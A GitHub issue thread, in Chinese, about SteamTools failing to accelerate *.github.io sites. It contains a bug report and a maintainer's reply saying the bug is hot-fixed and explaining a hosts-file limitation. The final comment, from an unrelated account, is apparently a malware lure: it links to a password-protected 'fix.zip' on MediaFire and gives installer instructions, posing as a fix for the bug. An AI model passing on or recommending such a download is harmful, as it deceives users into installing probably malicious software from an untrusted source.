### ISSUE TITLE
🐛[BUG] 无法加速github.io网站

### ISSUE THREAD

**Issue by Leilei332** [BeyondDimension/SteamTools#3460]
### 🐛 描述

在最近加速`*.github.io`的网站时发现其加速后显示了“远程主机强迫关闭了一个现有的连接”错误，在请求中则显示了502错误。

![图片](https://github.com/user-attachments/assets/e0883c21-c058-4c20-9749-39ed64b520aa)

### 📷 复现步骤

1. 开启加速，打开任何github.io网站
2. 看见“远程主机强迫关闭了一个现有的连接”错误

### 📄 日志信息

[nlog-all-2024-08-28.log](https://github.com/user-attachments/files/16781304/nlog-all-2024-08-28.log)

### 🚑 其他信息

- 处理器体系结构：x64 
- 系统版本号：Windows 10.19045.4780
- 下载渠道：GitHub
- 程序版本：3.0.0-rc9
- 是否包含独立运行时：无

**Comment by rmbadmin** [comment]
已热修复，同时*.github.io 这种格式因为hosts不支持，所以你得使用其他加速模式，或者自己在hosts内容中加入 对应 io二级域名

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
